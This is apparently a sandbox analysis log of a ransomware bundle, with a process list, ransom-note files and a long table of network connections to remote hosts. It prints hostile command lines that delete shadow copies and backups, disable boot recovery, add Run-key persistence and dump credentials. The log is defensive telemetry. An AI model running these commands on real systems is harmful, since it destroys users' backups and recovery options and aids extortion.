C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___VV5V_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___Q1EGTJTM_.txt

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected] co

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b @[email protected] vs

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected] vs

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004C8

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /d /c taskkill /f /im E > NUL & ping -n 1 127.0.0.1 > NUL & del C > NUL && exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im E

C:\Windows\SysWOW64\PING.EXE

ping -n 1 127.0.0.1

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "lldluhdhlxabv396" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "lldluhdhlxabv396" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004C8

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 6708 -ip 6708

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6708 -s 884

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.joinmassive.com udp
US 8.8.8.8:53 stats.walliant.com udp
US 18.172.89.91:443 api.joinmassive.com tcp
US 172.67.189.175:443 stats.walliant.com tcp
SG 76.73.17.194:9090 tcp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 175.189.67.172.in-addr.arpa udp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
CN 121.37.198.25:8287 121.37.198.25 tcp
US 8.8.8.8:53 25.198.37.121.in-addr.arpa udp
RU 91.218.114.4:80 91.218.114.4 tcp
US 172.67.138.35:443 still.topteamlife.com tcp
RU 87.236.16.222:443 tcp
US 8.8.8.8:53 34.178.98.87.in-addr.arpa udp
US 8.8.8.8:53 32.178.98.87.in-addr.arpa udp
US 8.8.8.8:53 9.178.98.87.in-addr.arpa udp
US 8.8.8.8:53 8.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 10.178.98.87.in-addr.arpa udp
US 8.8.8.8:53 5.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 6.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 34.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 32.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 24.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 28.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 33.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 31.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 7.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 22.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 26.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 21.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 255.178.98.87.in-addr.arpa udp
US 8.8.8.8:53 25.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 27.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 30.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 4.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 29.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 3.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 33.178.98.87.in-addr.arpa udp
US 8.8.8.8:53 0.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 35.178.98.87.in-addr.arpa udp
US 8.8.8.8:53 2.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 16.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 1.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 18.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 20.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 23.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 17.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 14.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 19.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 15.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 13.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 12.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 9.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 10.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 11.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 35.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 37.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 36.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 48.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 49.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 50.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 51.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 52.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 54.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 53.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 55.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 57.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 56.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 58.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 59.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 60.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 61.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 62.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 63.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 64.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 66.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 65.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 67.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 68.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 69.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 70.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 71.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 72.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 73.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 74.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 75.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 77.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 76.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 78.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 79.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 81.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 82.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 83.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 84.179.98.87.in-addr.arpa udp
RU 91.218.114.11:80 91.218.114.11 tcp
US 8.8.8.8:53 38.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 40.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 41.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 255.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 45.179.98.87.in-addr.arpa udp
RU 91.218.114.25:80 91.218.114.25 tcp
US 8.8.8.8:53 47.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.25:80 tcp
DE 131.188.40.189:443 tcp
FR 87.98.178.255:6893 udp
FR 87.98.179.0:6893 udp
FR 87.98.179.1:6893 udp
FR 87.98.179.2:6893 udp
FR 87.98.179.3:6893 udp
FR 87.98.179.4:6893 udp
FR 87.98.179.5:6893 udp
FR 87.98.179.6:6893 udp
FR 87.98.179.7:6893 udp
FR 87.98.179.8:6893 udp
FR 87.98.179.9:6893 udp
FR 87.98.179.10:6893 udp
FR 87.98.179.11:6893 udp
FR 87.98.179.12:6893 udp
FR 87.98.179.13:6893 udp
FR 87.98.179.14:6893 udp
FR 87.98.179.15:6893 udp
FR 87.98.179.16:6893 udp
FR 87.98.179.17:6893 udp
FR 87.98.179.18:6893 udp
FR 87.98.179.19:6893 udp
FR 87.98.179.20:6893 udp
FR 87.98.179.21:6893 udp
FR 87.98.179.22:6893 udp
FR 87.98.179.23:6893 udp
FR 87.98.179.24:6893 udp
FR 87.98.179.25:6893 udp
FR 87.98.179.26:6893 udp
FR 87.98.179.27:6893 udp
FR 87.98.179.28:6893 udp
FR 87.98.179.29:6893 udp
FR 87.98.179.30:6893 udp
FR 87.98.179.31:6893 udp
FR 87.98.179.32:6893 udp
FR 87.98.179.33:6893 udp
FR 87.98.179.34:6893 udp
FR 87.98.179.35:6893 udp
FR 87.98.179.36:6893 udp
FR 87.98.179.37:6893 udp
FR 87.98.179.38:6893 udp
FR 87.98.179.39:6893 udp
FR 87.98.179.40:6893 udp
FR 87.98.179.41:6893 udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
FR 87.98.179.42:6893 udp
FR 87.98.179.43:6893 udp
FR 87.98.179.44:6893 udp
FR 87.98.179.45:6893 udp
FR 87.98.179.46:6893 udp
FR 87.98.179.47:6893 udp
FR 87.98.179.48:6893 udp
FR 87.98.179.49:6893 udp
FR 87.98.179.50:6893 udp
FR 87.98.179.51:6893 udp
FR 87.98.179.52:6893 udp
FR 87.98.179.53:6893 udp
FR 87.98.179.54:6893 udp
FR 87.98.179.55:6893 udp
FR 87.98.179.56:6893 udp
FR 87.98.179.57:6893 udp
FR 87.98.179.58:6893 udp
FR 87.98.179.59:6893 udp
FR 87.98.179.60:6893 udp
FR 87.98.179.61:6893 udp
FR 87.98.179.62:6893 udp
FR 87.98.179.63:6893 udp
FR 87.98.179.64:6893 udp
FR 87.98.179.65:6893 udp
FR 87.98.179.66:6893 udp
FR 87.98.179.67:6893 udp
FR 87.98.179.68:6893 udp
FR 87.98.179.69:6893 udp
FR 87.98.179.70:6893 udp
FR 87.98.179.71:6893 udp
FR 87.98.179.72:6893 udp
FR 87.98.179.73:6893 udp
FR 87.98.179.74:6893 udp
FR 87.98.179.75:6893 udp
FR 87.98.179.76:6893 udp
FR 87.98.179.77:6893 udp
FR 87.98.179.78:6893 udp
FR 87.98.179.79:6893 udp
FR 87.98.179.80:6893 udp
FR 87.98.179.81:6893 udp
FR 87.98.179.82:6893 udp
FR 87.98.179.83:6893 udp
FR 87.98.179.84:6893 udp
FR 87.98.179.85:6893 udp
FR 87.98.179.86:6893 udp
FR 87.98.179.87:6893 udp
FR 87.98.179.88:6893 udp
FR 87.98.179.89:6893 udp
FR 87.98.179.90:6893 udp
FR 87.98.179.91:6893 udp
FR 87.98.179.92:6893 udp
FR 87.98.179.93:6893 udp
FR 87.98.179.94:6893 udp
FR 87.98.179.95:6893 udp
FR 87.98.179.96:6893 udp
FR 87.98.179.97:6893 udp
FR 87.98.179.98:6893 udp
FR 87.98.179.99:6893 udp
FR 87.98.179.100:6893 udp
FR 87.98.179.101:6893 udp
FR 87.98.179.102:6893 udp
FR 87.98.179.103:6893 udp
FR 87.98.179.104:6893 udp
FR 87.98.179.105:6893 udp
FR 87.98.179.106:6893 udp
FR 87.98.179.107:6893 udp
FR 87.98.179.108:6893 udp
FR 87.98.179.109:6893 udp
FR 87.98.179.110:6893 udp
FR 87.98.179.111:6893 udp
FR 87.98.179.112:6893 udp
FR 87.98.179.113:6893 udp
FR 87.98.179.114:6893 udp
FR 87.98.179.115:6893 udp
FR 87.98.179.116:6893 udp
FR 87.98.179.117:6893 udp
FR 87.98.179.118:6893 udp
FR 87.98.179.119:6893 udp
FR 87.98.179.120:6893 udp
FR 87.98.179.121:6893 udp
FR 87.98.179.122:6893 udp
FR 87.98.179.123:6893 udp
FR 87.98.179.124:6893 udp
FR 87.98.179.125:6893 udp
FR 87.98.179.126:6893 udp
FR 87.98.179.127:6893 udp
FR 87.98.179.128:6893 udp
FR 87.98.179.129:6893 udp
FR 87.98.179.130:6893 udp
FR 87.98.179.131:6893 udp
FR 87.98.179.132:6893 udp
FR 87.98.179.133:6893 udp
FR 87.98.179.134:6893 udp
FR 87.98.179.135:6893 udp
FR 87.98.179.136:6893 udp
FR 87.98.179.137:6893 udp
FR 87.98.179.138:6893 udp
FR 87.98.179.139:6893 udp
FR 87.98.179.140:6893 udp
FR 87.98.179.141:6893 udp
FR 87.98.179.142:6893 udp
FR 87.98.179.143:6893 udp
FR 87.98.179.144:6893 udp
FR 87.98.179.145:6893 udp
FR 87.98.179.146:6893 udp
FR 87.98.179.147:6893 udp
FR 87.98.179.148:6893 udp
FR 87.98.179.149:6893 udp
FR 87.98.179.150:6893 udp
FR 87.98.179.151:6893 udp
FR 87.98.179.152:6893 udp
FR 87.98.179.153:6893 udp
FR 87.98.179.154:6893 udp
FR 87.98.179.155:6893 udp
FR 87.98.179.156:6893 udp
FR 87.98.179.157:6893 udp
FR 87.98.179.158:6893 udp
FR 87.98.179.159:6893 udp
FR 87.98.179.160:6893 udp
FR 87.98.179.161:6893 udp
FR 87.98.179.162:6893 udp
FR 87.98.179.163:6893 udp
FR 87.98.179.164:6893 udp
FR 87.98.179.165:6893 udp
FR 87.98.179.166:6893 udp
FR 87.98.179.167:6893 udp
FR 87.98.179.168:6893 udp
FR 87.98.179.169:6893 udp
FR 87.98.179.170:6893 udp
FR 87.98.179.171:6893 udp
FR 87.98.179.172:6893 udp
FR 87.98.179.173:6893 udp
FR 87.98.179.174:6893 udp
FR 87.98.179.175:6893 udp
FR 87.98.179.176:6893 udp
FR 87.98.179.177:6893 udp
FR 87.98.179.178:6893 udp
FR 87.98.179.179:6893 udp
FR 87.98.179.180:6893 udp
FR 87.98.179.181:6893 udp
FR 87.98.179.182:6893 udp
FR 87.98.179.183:6893 udp
FR 87.98.179.184:6893 udp
FR 87.98.179.185:6893 udp
FR 87.98.179.186:6893 udp
FR 87.98.179.187:6893 udp
FR 87.98.179.188:6893 udp
FR 87.98.179.189:6893 udp
FR 87.98.179.190:6893 udp
FR 87.98.179.191:6893 udp
FR 87.98.179.192:6893 udp
FR 87.98.179.193:6893 udp
FR 87.98.179.194:6893 udp
FR 87.98.179.195:6893 udp
FR 87.98.179.196:6893 udp
FR 87.98.179.197:6893 udp
FR 87.98.179.198:6893 udp
FR 87.98.179.199:6893 udp
FR 87.98.179.200:6893 udp
FR 87.98.179.201:6893 udp
FR 87.98.179.202:6893 udp
FR 87.98.179.203:6893 udp
FR 87.98.179.204:6893 udp
FR 87.98.179.205:6893 udp
FR 87.98.179.206:6893 udp
FR 87.98.179.207:6893 udp
FR 87.98.179.208:6893 udp
FR 87.98.179.209:6893 udp
FR 87.98.179.210:6893 udp
FR 87.98.179.211:6893 udp
FR 87.98.179.212:6893 udp
FR 87.98.179.213:6893 udp
FR 87.98.179.214:6893 udp
FR 87.98.179.215:6893 udp
FR 87.98.179.216:6893 udp
FR 87.98.179.217:6893 udp
FR 87.98.179.218:6893 udp
FR 87.98.179.219:6893 udp
FR 87.98.179.220:6893 udp
FR 87.98.179.221:6893 udp
FR 87.98.179.222:6893 udp
FR 87.98.179.223:6893 udp
FR 87.98.179.224:6893 udp
FR 87.98.179.225:6893 udp
FR 87.98.179.226:6893 udp
FR 87.98.179.227:6893 udp
FR 87.98.179.228:6893 udp
FR 87.98.179.229:6893 udp
FR 87.98.179.230:6893 udp
FR 87.98.179.231:6893 udp
FR 87.98.179.232:6893 udp
FR 87.98.179.233:6893 udp
FR 87.98.179.234:6893 udp
FR 87.98.179.235:6893 udp
FR 87.98.179.236:6893 udp
FR 87.98.179.237:6893 udp
FR 87.98.179.238:6893 udp
FR 87.98.179.239:6893 udp
FR 87.98.179.240:6893 udp
FR 87.98.179.241:6893 udp
FR 87.98.179.242:6893 udp
FR 87.98.179.243:6893 udp
FR 87.98.179.244:6893 udp
FR 87.98.179.245:6893 udp
FR 87.98.179.246:6893 udp
FR 87.98.179.247:6893 udp
FR 87.98.179.248:6893 udp
FR 87.98.179.249:6893 udp
FR 87.98.179.250:6893 udp
FR 87.98.179.251:6893 udp
FR 87.98.179.252:6893 udp
FR 87.98.179.253:6893 udp
FR 87.98.179.254:6893 udp
RU 92.63.107.12:80 tcp
RU 91.218.114.31:80 tcp
RU 91.218.114.31:80 tcp
RU 91.218.114.32:80 tcp
SE 40.126.53.21:443 tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
RU 91.218.114.31:80 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.32:80 tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
RU 91.218.114.37:80 91.218.114.37 tcp
RU 91.218.114.38:80 tcp
RU 91.218.114.32:80 tcp
RU 91.218.114.32:80 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.38:80 tcp
RU 91.218.114.38:80 tcp
RU 91.218.114.4:80 tcp
RU 91.218.114.38:80 tcp
RU 91.218.114.26:80 tcp
RU 91.218.114.77:80 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 104.16.154.36:80 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.77:80 tcp
RU 91.218.114.77:80 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
N/A 127.0.0.1:49955 tcp
RU 91.218.114.77:80 tcp
LT 91.211.247.248:53 dlllwao.info udp
RU 91.218.114.79:80 tcp
US 185.196.8.22:80 dlllwao.info tcp
US 8.8.8.8:53 248.247.211.91.in-addr.arpa udp
US 8.8.8.8:53 22.8.196.185.in-addr.arpa udp
US 192.229.221.95:80 tcp
RU 91.218.114.11:80 tcp
US 104.16.154.36:443 tcp
US 8.8.8.8:53 udp
N/A 93.107.12.0:6893 udp
N/A 93.107.12.1:6893 udp
N/A 93.107.12.2:6893 udp
N/A 93.107.12.3:6893 udp
N/A 93.107.12.4:6893 udp
N/A 93.107.12.5:6893 udp
N/A 93.107.12.6:6893 udp
N/A 93.107.12.7:6893 udp
N/A 93.107.12.8:6893 udp
N/A 93.107.12.9:6893 udp
N/A 93.107.12.10:6893 udp
N/A 93.107.12.11:6893 udp
N/A 93.107.12.12:6893 udp
N/A 93.107.12.13:6893 udp
N/A 93.107.12.14:6893 udp
N/A 93.107.12.15:6893 udp
N/A 93.107.12.16:6893 udp
N/A 93.107.12.17:6893 udp
N/A 93.107.12.18:6893 udp
N/A 93.107.12.19:6893 udp
N/A 93.107.12.20:6893 udp
N/A 93.107.12.21:6893 udp
N/A 93.107.12.22:6893 udp
N/A 93.107.12.23:6893 udp
N/A 93.107.12.24:6893 udp
N/A 93.107.12.25:6893 udp
N/A 93.107.12.26:6893 udp
N/A 93.107.12.27:6893 udp
N/A 93.107.12.28:6893 udp
N/A 93.107.12.29:6893 udp
N/A 93.107.12.30:6893 udp
N/A 93.107.12.31:6893 udp
N/A 95.1.200.0:6893 udp
N/A 95.1.200.1:6893 udp
N/A 95.1.200.2:6893 udp
N/A 95.1.200.3:6893 udp
N/A 95.1.200.4:6893 udp
N/A 95.1.200.5:6893 udp
N/A 95.1.200.6:6893 udp
N/A 95.1.200.7:6893 udp
N/A 95.1.200.8:6893 udp
N/A 95.1.200.9:6893 udp
N/A 95.1.200.10:6893 udp
N/A 95.1.200.11:6893 udp
N/A 95.1.200.12:6893 udp
N/A 95.1.200.13:6893 udp
N/A 95.1.200.14:6893 udp
N/A 95.1.200.15:6893 udp
N/A 95.1.200.16:6893 udp
N/A 95.1.200.17:6893 udp
N/A 95.1.200.18:6893 udp
N/A 95.1.200.19:6893 udp
N/A 95.1.200.20:6893 udp
N/A 95.1.200.21:6893 udp
N/A 95.1.200.22:6893 udp
N/A 95.1.200.23:6893 udp
N/A 95.1.200.24:6893 udp
N/A 95.1.200.25:6893 udp
N/A 95.1.200.26:6893 udp
N/A 95.1.200.27:6893 udp
N/A 95.1.200.28:6893 udp
N/A 95.1.200.29:6893 udp
N/A 95.1.200.30:6893 udp
N/A 95.1.200.31:6893 udp
N/A 87.98.176.0:6893 udp
N/A 87.98.176.1:6893 udp
N/A 87.98.176.2:6893 udp
N/A 87.98.176.3:6893 udp
N/A 87.98.176.4:6893 udp
N/A 87.98.176.5:6893 udp
N/A 87.98.176.6:6893 udp
N/A 87.98.176.7:6893 udp
N/A 87.98.176.8:6893 udp
N/A 87.98.176.9:6893 udp
N/A 87.98.176.10:6893 udp
N/A 87.98.176.11:6893 udp
N/A 87.98.176.12:6893 udp
N/A 87.98.176.13:6893 udp
N/A 87.98.176.14:6893 udp
N/A 87.98.176.15:6893 udp
N/A 87.98.176.16:6893 udp
N/A 87.98.176.17:6893 udp
N/A 87.98.176.18:6893 udp
N/A 87.98.176.19:6893 udp
N/A 87.98.176.20:6893 udp
N/A 87.98.176.21:6893 udp
N/A 87.98.176.22:6893 udp
N/A 87.98.176.23:6893 udp
N/A 87.98.176.24:6893 udp
N/A 87.98.176.25:6893 udp
N/A 87.98.176.26:6893 udp
N/A 87.98.176.27:6893 udp
N/A 87.98.176.28:6893 udp
N/A 87.98.176.29:6893 udp
N/A 87.98.176.30:6893 udp
N/A 87.98.176.31:6893 udp
N/A 87.98.176.32:6893 udp
N/A 87.98.176.33:6893 udp
N/A 87.98.176.34:6893 udp
N/A 87.98.176.35:6893 udp
N/A 87.98.176.36:6893 udp
N/A 87.98.176.37:6893 udp
